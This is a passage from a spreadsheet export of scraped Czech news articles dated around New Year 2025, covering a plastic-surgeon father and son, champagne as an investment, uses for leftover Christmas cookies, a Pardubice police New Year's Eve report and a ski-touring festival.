rozhodně z tohoto mixu neextrahujme jednu typickou národní vlastnost. Jenže ono to všechno dohromady ovlivňuje zároveň i názor na to, co nás jako občany jedné země rozděluje… Jednoznačně z toho nejhůř vyšla politika a její reprezentanti. Ukázat pomyslným prstem na to a ty, co vráží mezi lidi klín, bylo pro respondenty průzkumu asi snazší. Možná logicky, politika je podhoubím veškerého pospolitého života a na ní závisí vše, co se děje ve společnosti, včetně celkové atmosféry… Takže ano, své výsledky má hodnocení politiky obecně, stejně jako vlády nebo opozice, podobně jako nejbližší komunální reprezentace. Tady je potřeba vrátit se ke kořenům zdravé společnosti, kterými jsou především výše zmiňované hodnoty. Musíme chtít prioritně hledat a stavět na tom, co nás spojuje, a ne posilovat v lidech zášť, strach, nenávist, netoleranci, a tím vším se cíleně rozdělovat a štvát proti sobě. Jsou doby dobré a doby horší, ale trvalá by měla být vůle a víra, že i když se právě nedaří, je v našich silách to zase zvrátit zpět k lepšímu. Přemýšlel jsem, jak si já sám pro sebe interpretuji výsledky tohoto průzkumu, že jistě s mnohými z těch dílčích, třeba i s úsměvem, souhlasím, a jiné opravdu stojí za hlubší analýzu. Mám pro sebe jeden zásadní závěr. Největším úkolem roku následujícího a let dalších by pro nás, jako společnost, měl být návrat k hodnotám! Těm, co přináší dobro a spolupráci. Zdůrazňování a opětovné zafixování v lidech všeho toho, co tvoří základní kameny každé zodpovědné společnosti. Společnosti, jejíž občané ctí právo a pravidla, kde vládne slušnost, respekt, úcta, láska, píle, ale i tolerance. Nerozdělujme, ani se nenechme rozdělovat a vše dobré v roce 2025! Autor: Jan Bartošek Autor Jan Bartošek</t>
  </si>
  <si>
    <t>16520</t>
  </si>
  <si>
    <t>20250101_180_3701463015_f3ae935948da032a44dc.html</t>
  </si>
  <si>
    <t>f3ae935948da032a44dc</t>
  </si>
  <si>
    <t>Zbytky cukroví využijte při pečení. Některé druhy můžete uchovávat v mrazáku</t>
  </si>
  <si>
    <t>Zbytky cukroví využijte při pečení. Některé druhy můžete uchovávat v mrazáku 2. 1. 2025 Šárka Cvrkalová Cukroví, Rady a tipy, Zajímavosti Komentáře nejsou povolené u textu s názvem Zbytky cukroví využijte při pečení. Některé druhy můžete uchovávat v mrazáku Většina z nás, co děláme cukroví, jako každý rok i během posledních Vánoc nadělala sladkého tolik, že se nestihlo spotřebovat. Některé druhy cukroví zmizí rychleji, jiných je ale doma i po Novém roce ještě hodně. Co se zbytky cukroví, aby se nezkazily a nemuseli jste je vyhazovat? Některé druhy cukroví se dají ukládat do mrazáku, jiné k tomu ale vhodné nejsou. Jak poznat, které vánoční sladkosti budou po vytažení z mrazáku dobré, a co dělat s těmi, které do mrazáku nepatří? Cukroví a mražení Dát si cukroví do mrazáku a vyndat ho za pár měsíců, až budete mít chuť na něco sladkého, se zdá jako dobrý nápad. Nicméně ne všechny druhy je vhodné k ledu dávat, upozorňuje Apetit. Zamrazujte především cukroví s nižším množstvím tuku. Pokud je totiž cukroví tučné, mohlo by zežluknout. Pokud chcete mrazit tučné cukroví, je dobré ho předtím zabalit do alobalu, v mrazáku ho ale nenechávejte déle než měsíc, radí iReceptář. Upečte z cukroví sušenky či buchtu Pokud vám zbylo větší množství lineckého nebo třeba vanilkových rohlíčků, můžete cukroví rozdrtit nebo rozmixovat a vytvořit z něj společně s dalšími ingrediencemi těsto, ze kterého pak uděláte čerstvé sušenky. Připravit ale můžete také jednoduchou buchtu ze zbytků cukroví. Podobným způsobem se dají využít i nepečené druhy cukroví. Kokosové kuličky nebo třeba rumové koule můžete smíchat a z těsta vytvořit základ na nový pokrm. Zlata Adamovská miluje italskou kuchyni. Pizzu sice nemusí, těstoviny a víno si dá ale velmi ráda Rozhodně se tedy najde mnoho způsobí, jak cukroví využít, nikdy není třeba ho vyhazovat. Někteří lidé navíc dělají tu chybu, že dávají zbytky domácím mazlíčkům. To nikdy nedělejte, varuje iDNES. Ořechy, rozinky a další ingredience běžně v cukroví obsažené jsou pro psy i kočky velmi nebezpečné. Zdroj: Blesk, Top Recepty, Žena IN, iReceptář, Dům a Zahrada , Apetit, iDNES Autor: Šárka Cvrkalová Autor: Šárka Cvrkalová Autor person Šárka Cvrkalová Rubrika transition_slide Cukroví</t>
  </si>
  <si>
    <t>20250101_181_3701167235_e5cb668d63f14d95b92d.html</t>
  </si>
  <si>
    <t>e5cb668d63f14d95b92d</t>
  </si>
  <si>
    <t>Předávání království jménem Esthé. Na drinku s&amp;nbsp;hvězdnými plastickými chirurgy</t>
  </si>
  <si>
    <t>Předávání království jménem Esthé . Na drinku s&amp;nbsp;hvězdnými plastickými chirurgy Jejich příjmení bylo a pořád je v Česku synonymem pro plastickou chirurgii. Tu estetickou i rekonstrukční. Žezlo desítky let držel Jan Měšťák . Čím dál víc ho ale přebírá jeho syn Ondřej , budoucí vládce kliniky Esthé. Vzít tátu a syna na drink do baru je na první dobrou ideální způsob, jak vytvořit co nejlepší atmosféru k rozhovoru. S novinářem, ale i mezi nimi dvěma. Až do chvíle, než zjistíte, že jste se klidně mohli sejít třeba v kanceláři a vyšlo by to skoro nastejno. Jan Měšťák totiž nepije. Letos v srpnu oslavil osmdesát let, takže to, že se vyhýbá alkoholu , nemusí být takové překvapení. Jenže on se nevyhýbá jen alkoholu , on nepije prakticky vůbec a má to tak skoro celý život. Přiznává, že z tohoto pohledu je asi trošku blázen, ale vlastní tělo ho prý naučilo, co mu svědčí. Jeden z nejlepších barmanů Česka Jan Šebek, král nového grandiózního baru v někdejším hotelu Evropa , dnes W Prague, tak v jeho případě vychází skoro naprázdno. Objednaným koktejlem to zachraňuje alespoň Ondřej Měšťák , s nímž jsme se v danou chvíli ne zcela plánovaně stali posluchači jeho otce. Ovšem ne že by to nějak vadilo… „Na každém poznám, když do sebe lije zbytečně moc vody. Většinou to jsou ti, kteří pak chtějí udělat víčka – mají je oteklá od přehnaného pitného režimu,“ říká muž, kterému stačí čtvrt litru vody denně. A podobně to má i s jídlem, jež sice rád vaří, ale jinak ho považuje za ztrátu času. „V půl deváté večer, když píšu text knihy nebo nějakou přednášku, si často uvědomím, že jsem ještě nesnídal,“ přiznává chirurg specializovaný na úpravu nosů. Dva Měšťáky od sebe dělí třicet sedm let. Pracují spolu sice na klinice Esthé, kterou Jan založil před víc než pětadvaceti roky, ale chvil, kdy se spolu takto v klidu posadí, moc není. Work-life balance je něco, s čím ani u jednoho z nich nepochodíte. Pokusy pozvat tátu v neděli na oběd jsou prý skoro zbytečné. Musíme rozjet naplno marketing, jehož součástí jsou newslettery, kvalitně zpracované profily na Instagramu nebo na Facebooku. Konzultace s pacienty, operace, výuka mediků, přednášky, mezinárodní konference, publikační činnost. Hodiny, dny, roky v tempu, které je vražedné, když si dovolím sáhnout po klišé z německého seriálu odehrávajícího se na tamních dálnicích. Abych byl ale spravedlivý, platí to pro oba. Čtrnáctihodinový pracovní den není nic, co by je vykolejilo. Zároveň ale oba ve stejnou chvíli okamžitě zdůrazní, že zásadní byla a je pro ně rodina. Že to není mluvení do větru, Jan Měšťák dokazoval hlavně před nějakými třiceti roky, kdy dcera a syn po rozvodu zůstali v jeho péči. Třináctiletý Ondra, devatenáctiletá Martina. Když na to dojde řeč, bez zaváhání vystřelí: „Bylo to úžasné, nejkrásnější období mého života. Tím jsem si naprosto jistý.“ Tehdy Janu Měšťákovi bylo padesát, nebyla to péče o malé děti, ale i tak to představovalo zásah do kariéry. Když se operace protáhly do večerních hodin, přišly výčitky, protože by bylo lepší být s dětmi doma. Ty už ale byly ve věku, kdy si dokázaly poradit samy. „Nebyl jsem z toho nijak vystresovaný. Dělal jsem si úkoly, hrál jsem si počítačové hry a chodil jsem s kámošema ven, začal jsem jezdit na skejtu,“ vzpomíná na tu dobu Ondřej . Táta pak nepřítomnost doma doháněl po nocích, kdy vyvařoval, aby děti měly druhý den co jíst. Ale také ráno, kdy hlavně syna vozil do školy. A tady máme další návyk, který Jana Měšťáka odlišuje od většiny populace. Obejde se skoro bez spánku. „Spím tři čtyři hodiny a stačí mi to. Využíval jsem zkrátka čas tak, aby děti byly na prvním místě. Musely být na prvním místě,“ skoro až dojemně zdůrazňuje, přičemž zároveň opakuje, jak důležité bylo vést je ke sportu. „Prostě proto, aby se na svět dívaly jinak.“ Spím tři čtyři hodiny a stačí mi to. Sport byl pro Jana Měšťáka přirozenou cestou. Zkusil kdeco, ale uspěl hlavně pod sítí. Od patnácti nakukoval do československé volejbalové reprezentace, kde byl později i kapitánem. „Sport to u mě měl jednodušší než škola,“ přiznává. Jeho puberta byla totiž divoká. Prospěch byl v pohodě. Co ale v pohodě nebylo, bylo množství obdržených poznámek a dvojek a trojek z chování. Dostat se pak někam na střední školu byl problém. Vzít si do školy sígra se nikomu nechtělo. Ani k nám nejezděte na přijímačky, napsali mu z hotelovky v Mariánských Lázních . Nakonec tak Měšťák skončil ve Fyzikálním ústavu ČSAV , kde pracovala jeho maminka a kde se vyučil mechanikem pro přesné přístroje. Bylo mu šestnáct a tehdy se v něm něco zlomilo. „Kvůli nešťastné mamince,“ přiznává. Z rebela se stal dříč, jenž si na dvouleté večerní škole dodělal maturitu a zamířil na přijímačky na matfyz. Jenže pohořel na logaritmech a přišla vojna, na které mu pomohl volejbal, díky němuž se dostal do družstva Československé lidové armády Dukla Kolín . Ve druhém roce navíc zamířil na ošetřovnu, kde se z něj stal lapiduch. Ano, tady se zjevila medicína, na niž se po propuštění z armády přihlásil. Jak to dopadlo, víme. Jak to měl Ondřej ? Foto Michael Tomeš Mnohem přímočařejší, řekněme. Tlak, aby na otce navázal, ale necítil. „Medicína byla moje přirozená volba,“ říká. Větší krize přišla jen v prvním ročníku, kdy kvůli mononukleóze, již provází únava, uvažoval o tom, že školu vzdá. „V tu chvíli pomohl táta, který mě přesvědčil, že všechno se dá zvládnout,“ vzpomíná, zatímco jeho otec už poněkolikáté stylem, jenž je skoro až roztomile upřímný, poznamenává, že se z Ondřeje stal extrémně schopný a chytrý lékař. A skvělý táta, nezapomene dodat. Že to nejsou jen slova, se dá dokázat docenturou, kterou obhájil v šestatřiceti letech. Potvrzení o dokonalém otcovství nechme nejlépe na Ondřejově rodině. Vystudovaná medicína ale ke spolupráci otce a syna Měšťákových coby plastických chirurgů nevedla. Škola je pro lékaře obvykle jen začátek. U Ondřeje cesta pokračovala přes rakovnickou nemocnici a všeobecnou chirurgii a následně pražskou nemocnici Bulovka , kde se zaměřil na břišní chirurgii. „K plastice mě to ale táhlo. Vyrůstal jsem v tom, bylo to pro mě automatické,“ připouští chirurg, který se vedle estetické chirurgie specializuje i na rekonstrukční operace prsů žen typicky po onkologickém onemocnění. Profesní cesty se začaly konečně propojovat. Pomyslným cílem byla klinika Esthé . Tu Jan Měšťák založil v roce 1997. Jak sám říká, díky Tomáši Kolowratovi , jehož otce Jindřicha operoval. „ Tomáš mi tenkrát dával obálku s penězi, tak jsem mu řekl, že jestli chce slyšet, jak Měšťák pošle hraběte do prdele, tak ať mi to ještě chvíli nutí. Nepřestal a já jsem ho tam poslal.“ Tak vzniklo roky trvající přátelství, které se přetavilo v nabídku zřídit kliniku v Kolowratském paláci v ulici Na Příkopě . Nezůstalo ale jen u prostor. Kolowrat nabídl i půjčku padesáti milionů, které bylo nutné prostavět. Esthé je pak roky splácela formou nájmu. Miloš Zapletal , Jiří Adamec – dvojice mužů, která Československu a následně Česku dala soutěž Miss, pořad, jenž patřil k vůbec nejsledovanějším v roce. A Jan Měšťák skoro dvě dekády seděl v porotě. Lepší reklama pro Esthé se sehnat nedala. Jenže dnes Miss už zajímá jen zlomek lidí v Česku a i sláva kliniky začala vadnout. Tady za celou dobu rozhovoru přichází první zvýšení hlasu Jana Měšťáka . Stačí totiž položit otázku, jestli je Jan Měšťák podnikatel, na což Ondřej reaguje odpovědí, že moc ne. Mimochodem, druhé zvýšení hlasu nastalo, když skoro až s opovržením popisoval, jak nesnese, když mu někdo říká dědo. Zakázané to mají dokonce i vlastní vnoučata. Foto Michael Tomeš „Co to znamená?! Postavil jsem třetí kliniku plastické chirurgie v republice, vyhrál jsem podnikatelskou soutěž ústavů lékařské estetiky, založil jsem kliniku Esthé. Já že nejsem podnikatel?“ rozohní se najednou jinak extrémně klidný osmdesátník, jehož zklidní až synovo doplnění, že jeho hodnocení bylo myšleno z pohledu toho, že podnikatelé podnikají kvůli penězům. „A to u tebe, tati, neplatí,“ dodá Měšťák junior, což jeho táta souhlasně odkýve a přizná, že nesnáší byznys v medicíně. Navíc všechny peníze, které za poslední roky v estetické chirurgii vydělal, rozdal na dobročinné účely. „Pro samoživitelky, invalidní důchodce, dětské domovy, psí útulky… Ročně to je kolem pěti milionů. Proto opravdu nejsem podnikatel,“ připustí s tím, že peníze, které dává potřebným, najednou začaly chybět. V podnikání i v osobním životě. „Já toho moc nepotřebuju, ale dcera promuje a moje bývalá žena se mě zeptá, co jí dám. A já nemám co jí dát, protože to nemůžu zaplatit. Já jsem všechny peníze rozdal, víš.“ Poslední dobou tak mezi otcem a synem dochází k předání byznysu spojeného s klinikou, která loni skončila s obratem kolem sto milionů korun. Je to Ondřej , kdo dnes vlastní tři čtvrtiny akcií Esthé , pětadvacet procent si Jan Měšťák zatím ponechal a stále zůstává hlavním lékařem a statutárním šéfem. Výkonné řízení svěřuje jiným – synovi a ředitelce Jitce Bělušové. Ti už nemůžou spoléhat jen na charisma Měšťáka staršího a někdejší podporu díky spojení se soutěží Miss. „Tenkrát stačil jeden televizní přenos a pár rozhovorů v časopisech. Pak už to jelo jako perpetuum mobile, protože když lékaři mají nějakou klientelu, klienti za nimi chodí sami. V dnešní době je to ale extrémně roztříštěné.“ „Roli převzaly hlavně sociální sítě. Musíme tak rozjet naplno marketing, jehož součástí jsou newslettery, kvalitně zpracované profily na Instagramu nebo na Facebooku. Samozřejmě to stojí docela dost peněz, což táta nerad vidí,“ vysvětluje Ondřej . Ani on ale Esthé nebere jako primárně výdělečný projekt. Teď je to dokonce spíš naopak, protože většina prostředků míří do rekonstrukce kliniky a dalších vylepšení. „Musíme si mnohem víc hlídat cashflow. A táta nesmí dávat tak velké slevy,“ směje se Ondřej, jenž si uvědomuje i proměnu trhu s ohledem na konkurenci, která v poslední dekádě přibyla a je marketingově mnohem zdatnější. „Je to průšvih pro Esthé, to vím. Ale, Ondro, už vím, že velké slevy dávat nesmím. Fakt, čestné slovo,“ zazní otcova reakce. Jak dlouho bude Jan Měšťák ještě operovat? Bez přemýšlení odpoví, že alespoň deset let. „Je to moje nátura. Jak někdo přestane dělat, co ho baví, brzy skončí,“ dodá. Foto Michael Tomeš Že slova jen nehází do vzduchu, dokresluje tím, jak si nedávno po zakopnutí na ulici zlomil páteř, ale ještě před vlastní operací odoperoval dvěma pacientkám nos. Prý proto, že jim to slíbil. Děti takových rodičů v podobných chvílích obvykle kroutí hlavou. Ondřej Měšťák zůstává klidný. A nemění se to ani při popisu průběhu rekonvalescence po operaci zmíněného zranění. „Do té doby jsem každé ráno dělal sedmdesát sedm sklapovaček s činkami. Desátý den po operaci, kdy mi dali do páteře dva šrouby, jsem těch sklapovaček udělal čtyřicet sedm. Jako jemný mechanik jsem totiž věděl, že to ty šrouby udrží. Když se paní doktorka dívala na kontrolní rentgen, všem ukazovala, jak se hojím dobře. Když člověk nekňourá, vyléčí se rychleji,“ popisuje svůj přístup k životu Jan Měšťák. Ondřej jen poslouchá a celé to uzavře: „Táta je v lecčems trošku superman. Když si něco umane, udělá to.“ Autor: Ondřej Kinkor Autor Ondřej Kinkor</t>
  </si>
  <si>
    <t>13570</t>
  </si>
  <si>
    <t>20250101_182_3695748813_f356477df05935fc89b8.html</t>
  </si>
  <si>
    <t>f356477df05935fc89b8</t>
  </si>
  <si>
    <t>Místo popíjení šampaňského na Silvestra je možná na čase do něj investovat</t>
  </si>
  <si>
    <t>Místo popíjení šampaňského na Silvestra je možná na čase do něj investovat Silvestr je tradičně spojen se šampaňským, které mnozí z nás zvedli k přípitku, aby přivítali nový rok. Chcete využít této příležitosti? Přihlaste se k odběru newsletteru Klíčové body Silvestr je nejen čas na přípitek šampaňským, ale i příležitost k investici do prestižních lahví Investiční trh se šampaňským zažívá krátkodobý pokles, ale některé lahve si stále drží hodnotu Speciální kategorie „grower“ šampaňského zaujímá sběratele a dosahuje rekordních cen na aukcích Současný pokles cen šampaňského odborníci vidí jako ideální příležitost k nákupu a diverzifikaci portfolia Ale zatímco většina lidí šampaňské otevírá a slavnostně vypije, rostoucí skupina milovníků tohoto ikonického nápoje se na lahve dívá jako na investici. Ano, šampaňské nenabízí jen chuťový zážitek, ale i finanční potenciál, který jej staví na roveň kultovním vínům z Bordeaux nebo Kalifornie . Šampaňské jako sběratelská investice Podle odborníků má šampaňské unikátní přitažlivost. Brian Freedman, autor knihy „Crushed: How A Changing Climate Is Altering the Way We Drink“, upozorňuje, že šampaňské je výjimečné svou schopností propojit vášeň, znalosti a lásku k dobrému pití. Tento sentiment potvrzují i data z trhu s investičním vínem . I když ceny investičního šampaňského zaznamenaly v roce 2024 pokles o téměř 10 %, podle indexu Liv-ex Champagne 50 si vedly lépe než širší index investičních vín Liv-ex Fine Wine 1000, který klesl o 11,2 %. Pandemie COVID-19 způsobila prudký nárůst cen šampaňského, kdy poptávka předčila nabídku. S postupným oživením ekonomiky se však trh stabilizoval. Pokles cen byl způsoben zároveň klesající poptávkou na čínském trhu, který patří mezi klíčové odběratele luxusních vín. I přes to si některé ikonické lahve udržely svou hodnotu a věří se, že trh je nyní na přelomu, který přináší příležitosti pro investory. Příklady investičního úšpěchu Anthony Zhang, spoluzakladatel platformy Vinovest, která umožňuje investice do vín, zmiňuje Dom Pérignon z roku 2009 jako příklad lahve s dobrým investičním potenciálem. Zdroj: Getty Images Tato ikonická značka se prodává za zhruba 200 dolarů, ale v posledních letech zaznamenává stabilní růst hodnoty. Další zajímavou kategorií jsou tzv. „grower“ šampaňské, tedy lahve vyráběné producenty, kteří sami pěstují hrozny. Tato omezená produkce přitahuje pozornost sběratelů a jejich ceny můžou být velmi vysoké. Mahesh Patel, sběratel a zakladatel Universal Whisky Experience , upozorňuje, že tři lahve velikosti magnum Salon Le Mesnil, Blanc de Blancs 1990, byly na aukci Sotheby ’s prodány za 26 850 dolarů. Tento úspěch dokazuje, že i v období poklesu trhu mohou některé lahve dosahovat rekordních cen. Nákupní příležitost Odborníci předpokládají, že pokles cen šampaňského nebude dlouhodobý. Podle Zhanga má tento trh tendenci zotavovat se v horizontu deseti čítvrtletí, což z něj dělá atraktivní oblast pro trpělivé investory. Současný pokles, který trvá přibližně dva roky, Zhang vidí jako jedinečnou příležitost k nákupu, zejména pro ty, kteří se nebojí využít poklesu cen na specializovaných trzích. Investice do šampaňského navíc nabízí nejen možnost zhodnocení, ale také funguje jako vhodný způsob diverzifikace portfolia vůči tradičním aktivům, jako jsou akcie nebo nemovitosti. Tento trh kombinuje estetiku, prestiž a finanční hodnotu, což získává na oblibě nejen mezi profesionálními investory, ale i mezi milovníky vína , kteří hledají dlouhodobou investici s emocionální vazbou. Šampaňské jako oslava i investice Přestože šampaňské může být přitažlivou investicí, nemělo by se zapomínat na jeho původní účel – oslavit výjimečné okamžiky. „Vypiji několik lahví,“ uvedl Zhang o svých silvestrovských plánech. Stejně tak mnozí milovníci šampaňského oceňují jeho schopnost spojovat lidi a tvořit nezapomenutelné vzpomínky. Zdroj: Getty Images Kombinace finančního potenciálu a symbolické hodnoty dělá z šampaňského jedinečnou investici. Ač už si letos na Silvestra vychutnáte skleničku, nebo zvážíte uložení několika lahví do sklepa, můžete být souččástí příběhu, který spojuje tradici a hodnotu. Šampaňské totiž zůstává symbolem luxusu, radosti a oslavy, který má své pevné místo nejen na slavnostním stole, ale i v portfoliích investorů. Jeho časem ověřená přitažlivost dokazuje, že někdy může být nejlepší přípitek ten, který ještě čeká na svou příležitost být otevřen. Ať už hledáte investiční příležitost, nebo jen chcete přivítat nový rok ve velkém stylu, šampaňské vám nabízí obojí. Ale zatímco většina lidí šampaňské otevírá a slavnostně vypije, rostoucí skupina milovníků tohoto ikonického nápoje se na lahve dívá jako na investici. Ano, šampaňské nenabízí jen chuťový zážitek, ale i finanční potenciál, který jej staví na roveň kultovním vínům z Bordeaux nebo Kalifornie .Šampaňské jako sběratelská investicePodle odborníků má šampaňské unikátní přitažlivost. Brian Freedman, autor knihy „Crushed: How A Changing Climate Is Altering the Way We Drink“, upozorňuje, že šampaňské je výjimečné svou schopností propojit vášeň, znalosti a lásku k dobrému pití. Tento sentiment potvrzují i data z trhu s investičním vínem . I když ceny investičního šampaňského zaznamenaly v roce 2024 pokles o téměř 10 %, podle indexu Liv-ex Champagne 50 si vedly lépe než širší index investičních vín Liv-ex Fine Wine 1000, který klesl o 11,2 %.Pandemie COVID-19 způsobila prudký nárůst cen šampaňského, kdy poptávka předčila nabídku. S postupným oživením ekonomiky se však trh stabilizoval. Pokles cen byl způsoben zároveň klesající poptávkou na čínském trhu, který patří mezi klíčové odběratele luxusních vín. I přes to si některé ikonické lahve udržely svou hodnotu a věří se, že trh je nyní na přelomu, který přináší příležitosti pro investory.Příklady investičního úšpěchuAnthony Zhang, spoluzakladatel platformy Vinovest, která umožňuje investice do vín, zmiňuje Dom Pérignon z roku 2009 jako příklad lahve s dobrým investičním potenciálem. Tato ikonická značka se prodává za zhruba 200 dolarů, ale v posledních letech zaznamenává stabilní růst hodnoty. Další zajímavou kategorií jsou tzv. „grower“ šampaňské, tedy lahve vyráběné producenty, kteří sami pěstují hrozny. Tato omezená produkce přitahuje pozornost sběratelů a jejich ceny můžou být velmi vysoké.Mahesh Patel, sběratel a zakladatel Universal Whisky Experience , upozorňuje, že tři lahve velikosti magnum Salon Le Mesnil, Blanc de Blancs 1990, byly na aukci Sotheby ’s prodány za 26 850 dolarů. Tento úspěch dokazuje, že i v období poklesu trhu mohou některé lahve dosahovat rekordních cen.Nákupní příležitostOdborníci předpokládají, že pokles cen šampaňského nebude dlouhodobý. Podle Zhanga má tento trh tendenci zotavovat se v horizontu deseti čítvrtletí, což z něj dělá atraktivní oblast pro trpělivé investory. Současný pokles, který trvá přibližně dva roky, Zhang vidí jako jedinečnou příležitost k nákupu, zejména pro ty, kteří se nebojí využít poklesu cen na specializovaných trzích. Investice do šampaňského navíc nabízí nejen možnost zhodnocení, ale také funguje jako vhodný způsob diverzifikace portfolia vůči tradičním aktivům, jako jsou akcie nebo nemovitosti. Tento trh kombinuje estetiku, prestiž a finanční hodnotu, což získává na oblibě nejen mezi profesionálními investory, ale i mezi milovníky vína , kteří hledají dlouhodobou investici s emocionální vazbou.Šampaňské jako oslava i investicePřestože šampaňské může být přitažlivou investicí, nemělo by se zapomínat na jeho původní účel – oslavit výjimečné okamžiky. „Vypiji několik lahví,“ uvedl Zhang o svých silvestrovských plánech. Stejně tak mnozí milovníci šampaňského oceňují jeho schopnost spojovat lidi a tvořit nezapomenutelné vzpomínky.Kombinace finančního potenciálu a symbolické hodnoty dělá z šampaňského jedinečnou investici. Ač už si letos na Silvestra vychutnáte skleničku, nebo zvážíte uložení několika lahví do sklepa, můžete být souččástí příběhu, který spojuje tradici a hodnotu. Šampaňské totiž zůstává symbolem luxusu, radosti a oslavy, který má své pevné místo nejen na slavnostním stole, ale i v portfoliích investorů. Jeho časem ověřená přitažlivost dokazuje, že někdy může být nejlepší přípitek ten, který ještě čeká na svou příležitost být otevřen. Ať už hledáte investiční příležitost, nebo jen chcete přivítat nový rok ve velkém stylu, šampaňské vám nabízí obojí. Zanechte svůj telefon a email a budete kontaktováni licencovanými odborníky Ponechte toto pole prázdné. Δ Související: Autor: Jan Golda Autor person Jan Golda Rubrika transition_slide Alternativní investice</t>
  </si>
  <si>
    <t>3340</t>
  </si>
  <si>
    <t>20250101_183_3695811012_80ffc5d3bd1a05240ea8.html</t>
  </si>
  <si>
    <t>80ffc5d3bd1a05240ea8</t>
  </si>
  <si>
    <t>Silvestr v&amp;nbsp;Pardubicích. Přeplněná záchytka a opilý kluk i pomoc seniorce</t>
  </si>
  <si>
    <t>Silvestr v&amp;nbsp; Pardubicích . Přeplněná záchytka a opilý kluk i pomoc seniorce Pardubice – Poslední noční služba roku 2024 v Pardubicích byla pro strážníky pestrá. Hned první výjezd na krátce po začátku služby byl na 14letého chlapce, který byl pod silným vlivem alkoholu . Nadýchal 1,55 promile a vzhledem ke stavu, ve kterém se nacházel, počkal v péči záchranné služby do příjezdu zákonných zástupců. Poté přišla špatná zpráva. Pardubická záchytka vyčerpala své kapacity hned z kraje večera. Adeptem na umístění totiž byl opilý muž z Ostravska , který hlídky strážníků i policistů zaměstnával průběžně od časného večera až do půlnoci. Svým nesnesitelným jednáním vyvolal postupně několik konfliktů, kde pak ještě následnými oznámeními a stížnostmi zaměstnával strážníky a policisty, na které chrlil urážky. Toto počínání by mu normálně zaručilo místo na záchytné stanici, jenže ta už byla plná. Postupem večera se tento problémový muž odebral na nádraží a jeho počínáním se nakonec bude zabývat správní orgán. Prvními výjezdy roku 2025 bylo probuzení a vykázání opilého muže z vagonu v železničním depu u hlavního nádraží. Vzápětí dvě hlídky vyjely k požáru kontejneru na sídlišti Dubina. Strážníci před příjezdem hasičů zkontrolovali, že se v kontejnerovém stání nenachází žádné osoby a odtáhli požárem nezasažené popelnice od ohně. O zbytek se pak postarali pardubičtí hasiči. Chvíli po půlnoci museli policisté a strážníci rychle krotit vášně na třídě Míru. Tam do hostů před barem začala strkat procházející skupina 15 fotbalových chuligánů mířících na vlak do Prahy . Strážníci po tomto incidentu tuto skupinu doprovázeli až k nádraží, aby nedošlo k dalším konfliktům. Těsně před třetí hodinou ráno vyjeli strážníci na Signál v tísni. Seniorka ročník 1941 si pomocí nouzového tlačítka přivolala pomoc. Strážníci vstoupili do bytu, zkontrolovali ženin stav a vzhledem k seznamu obtíží přivolali na místo posádku záchranné služby. Autor: Jiří Sejkora Zdroj a foto: Městská policie Pardubice Autor: Jiří Sejkora Autor person Jiří Sejkora Rubrika transition_slide Pardubice</t>
  </si>
  <si>
    <t>20250101_184_3709290441_8acdf0f6201a725528ef.html</t>
  </si>
  <si>
    <t>8acdf0f6201a725528ef</t>
  </si>
  <si>
    <t>SkialpujFest! Bohové tuleních pásů znovu míří do Krkonoš</t>
  </si>
  <si>
    <t>Shrnutí SkialpujFest! Bohové tuleních pásů znovu míří do Krkonoš Tomáš Nohejl 1. 1. 2025 Čtvrtý ročník čtyřdenního skialpového festivalu se tuto zimu uskuteční od 16. do 19. ledna 2025. „Rozšiřujeme se a předpověď vypadá nadějně. Bude to bezva,“ těší se nadšeně hlavní organizátor Jan Klouček. Festival plný sněhu, lyžování, horské medicíny, lavinové prevence, a hlavně skialpinismu se uskuteční tradičně v centru tohoto sportu v Peci pod Sněžkou . Proběhne opět formou přednášek a workshopů na horských boudách v jejím okolí, kam se účastníci dostanou jak jinak než na skialpových lyžích. Součástí čtyřdenního festu je i největší tuzemský skialpový závod u nás Noc tuleních pásů. Každý den čeká na účastníky nabitý program, který si sami sestaví podle svých představ. Probíhá na několika místech současně, do toho testovačky vybavení, skialpové procházky, praktická cvičení přímo na sněhu nebo takové speciality jako biatlonový závod na skialpových lyžích. „Sestavit si program je možná těžší úkol než samotná účast na festivalu,“ směje se Klouček. „Naší snahou bylo ho namixovat tak, aby si v něm našli své jak začátečníci, tak pokročilí, jak ti, co byli na festivalu v minulých letech, tak ti, kteří jedou poprvé. Nechybí oblíbené lavinové kurzy, workshopy pro začátečníky, výuka lyžování nebo přednášky o první pomoci. K nim ale přidáváme specializované kurzy ledolezení, jištění na ledu, horské medicíny nebo obyčejnou procházku v levandulových cylindrech, během níž podpoříme nadaci Fuck Cancer,“ doplňuje. Složitý výběr budou mít návštěvníci také pro páteční večer, kdy jsou na programu hlavní bloky přednášek v sálech v Peci pod Sněžkou . Zatím se lze jen domnívat, zda v pomyslné „soutěži“ o tu nejnavštěvovanější vyhraje stand-up show Juraje „Koreně“ Ďurifuka, „nejextrémnějšího“ Slováka, který se řadí mezi přední světové paraglidisty, panelová diskuze Aleny Zárybnické se svědky a účastníky největších lavinových nehod u nás, životní příběh lékařky a specialistky na horskou medicínu MUDr. Kristiny Höschlové nebo některé z šesti dalších témat. Nově proběhnou také „odpočinkové“ workshopy, na kterých půjde hlavně o legraci a zábavu. Zbrusu nový festivalový závod týmů, skialpový Festatlon, slibuje bolavé bránice a možná i hlavy. Bude na něm totiž pivo a svařák zdarma! Pro ty, kteří přijedou na festival sami, bude připravena skialpová seznamka a pro gurmány a milovníky piva zase výlet po třech lokálních pivovarech. A s kým se bude možné potkat? Jako každý rok povede několik workshopů olympionik Ondřej Moravec . Bude tu i Jan Trávníček s mnoha příběhy z Nepálu . Sjezdového workshopu se zhostí dvojnásobný držitel horolezeckého ocenění Piolet d’Or (tzv. Zlatý cepín) Zdeněk „Háček“ Hák, který společně se svými spolulezci povede i jednu z hlavních přednášek. Chybět nebudou ani slovenští hosté Marek Biskupič a Ján Kořínek. Své zkušenosti se pokusí předat horští vůdci Vojtěch Dvořák , Ján Kořínek, Janek Bednařík, Honza Hais, sedminásobný vítěz Noci tuleních pásů Radoslav Groh , členové Horské služby a další a další. Lenka Erlebachová se zhostí přednášky o čistě holčičím výstupu na Gašerbrum I, Ondřej Novák se postará o to, aby každý skialpinista jezdil dolů z kopce jednoduše a úsporně. Festival vyvrcholí již osmnáctým ročníkem Noci tuleních pásů největšího skialpinistického závodu v Česku. Hobby závod dvojic je srdcovou záležitostí mnoha nejen skialpinistů. Slavnostní zahajovací průvod závodníků uzavřeným centrem města Pec pod Sněžkou jako by symbolicky startoval celou nadcházející skialpovou sezonu. „Samotný závod se běží při svitu měsíce a čelovek a pětisethlavý světelný had stoupající na Růžohorky je působivou podívanou opravdu pro každého! Kdo si ještě netroufne, může v ten samý čas vyrazit na oblíbenou 